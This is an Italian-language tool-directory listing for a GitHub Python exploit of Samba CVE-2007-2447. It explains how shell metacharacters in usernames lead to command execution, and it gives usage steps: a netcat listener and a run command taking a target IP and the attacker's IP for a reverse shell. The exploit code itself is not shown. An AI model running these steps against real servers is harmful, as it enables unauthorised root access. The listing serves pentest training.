Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Samba-CVE-2007-2447-Exploit-Username-Map-Script — Exploit di Samba CVE-2007-2447 | Kitploit
Strumenti/GitHubGitHub/daviddoctor/samba-cve-2007-2447-exploit-username-map-script
Analisi delle VulnerabilitàExploitPenetration TestingCommand and ControlApprendimento e FormazioneStrumento di Accesso Remoto
GitHubdaviddoctor/samba-cve-2007-2447-exploit-username-map-script

Samba-CVE-2007-2447-Exploit-Username-Map-Script

Exploit di Samba CVE-2007-2447

Vedi Repository
24 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Samba CVE-2007-2447 Exploit (Username Map Script)

Questo repository contiene uno script Python progettato per automatizzare lo sfruttamento della vulnerabilità CVE-2007-2447 nei server Samba (versioni 3.0.20 a 3.0.25rc3). Questo strumento è stato sviluppato a fini esclusivamente educativi e per test di penetrazione autorizzati.

📝 Descrizione Tecnico-Accademica

La vulnerabilità "Username Map Script" si verifica a causa della mancanza di sanitizzazione dell'input dei nomi utente quando l'opzione username map script è abilitata nella configurazione di Samba. Inviando un nome utente che contiene metacaratteri di shell (come backtick ` o sub-shell $()), il server esegue tali comandi con i privilegi del servizio (spesso root).

🚀 Requisiti

  • Sistema Operativo: Kali Linux / Parrot OS (o qualsiasi Linux con smbclient installato).
  • Linguaggio: Python 3.x.
  • Dipendenze: smbclient (deve essere disponibile nel PATH di sistema).
  • 🛠️ Installazione e Utilizzo

    1. Clonare il repository:
      root@kitploit:~
      git clone [https://github.com/Daviddoctor/Samba-CVE-2007-2447-Exploit-Username-Map-Script-.git]
      cd samba-exploit-cve-2007-2447
      
    2. Dare i permessi di esecuzione chmod +x exploit.py
    3. Preparare il Listener (Kali Linux) nc -lvnp 4444
    4. Eseguire l'exploit ./exploit.py <IP_OBJETIVO> <TU_IP_KALI> -p 4444
    Scarica lo strumento